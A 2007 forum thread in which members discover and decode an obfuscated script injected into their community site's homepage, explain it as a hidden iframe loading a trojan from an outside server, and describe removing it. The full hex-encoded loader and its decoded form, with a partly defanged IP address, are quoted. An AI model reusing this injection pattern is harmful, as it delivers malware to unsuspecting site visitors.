Security Issue - Read Please!

bjornredtail · August 29, 2007, 07:40:53 PM

Chances are he didn't. There may be some sort of file or shell exploit in some of the software running on the webserver that hosts this website.

Quote
function FUNC1(ARG1){
return(parseInt(ARG1,16));
}
function FUNC2(ARG2){
var VARIBLE1 ='';
for(COUNTER = 0; COUNTER<ARG2.length; COUNTER+=2){
VARIBLE1 +=(String.fromCharCode(FUNC1(ARG2.substr(COUNTER, 2))));
}
return VARIBLE1;
} document.write(FUNC2('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D316139633132207372633D5C27687474703A2F2F35382E36352E3233352E3135332F7E706F7A69746976652F6963652F696E6465782E7068703F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3830343433292B27386432666361373133315C272077696474683D373831206865696768743D313033207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));

A bit of a translation of the code... I'll try firing up my linux box and execuateing it.

bjornredtail · August 29, 2007, 10:48:41 PM

Okay, first, in case the URL's auto link: DO NOT CLICK ANY LINK IN THE FOLLOWING POST. The URL is to the server that the hacked code points to.

Quote3CSCRIPT>window.status='Done';document.write('<iframe name=1a9c12 src=\'http://(adding_this_to_keep_link_from_working)58.65.235.153.(adding_this_to_keep_link_from_working)/~pozitive/ice/index.php?'+Math.round(Math.random()*80443)+'8d2fca7131\' width=781 height=103 style=\'display: none\'></iframe>')</SCRIPT>

That's what all that hex garbage translates too, minus the (adding_this_to_keep_link_from_working) part of course.

At the moment that server appears to be down...

Shadow · August 29, 2007, 11:45:28 PM

what does that mean?? :?

im computer illiterate for the most part

bjornredtail · August 29, 2007, 11:59:06 PM

The thing just prints all that hex stuff to the web page. Your browser turns it into the code I posted in the previous post, which in turn attempts to load a trojan horse from another server, which thankfully is down at the moment.

Shadow · August 30, 2007, 08:55:41 AM

I hope Retto can fix it... how hard is it to get rid of that code once he knows about it?

windhound · August 30, 2007, 11:51:56 AM

As easy as opening his ftp / ssh client, opening index.php in a text editor (notepad) highlighting the offending line, and pushing delete. Then ofcourse pushing the save button.

The slight issue would be making sure it doesnt happen again, but its more likely a problem with the server, which I'm assuming retto has no control over

bjornredtail · August 30, 2007, 01:37:46 PM

ssh rovl.org
...
login as: whatever
password:

...
vim index.php
j
j
j
j
...
dd
:wq
logout

Assuming of course that only the homepage was compromised. Still, if Retto wasn't in class at the moment, or if someone else had SSH access it would have already been fixed.

bjornredtail · August 31, 2007, 08:50:02 PM

It appears as if the breakin has been successfully cleaned up. The malicious code has been replaced with a rather amusing comment.

Shadow · August 31, 2007, 11:03:22 PM

what is it lol - how much do you like kung fu?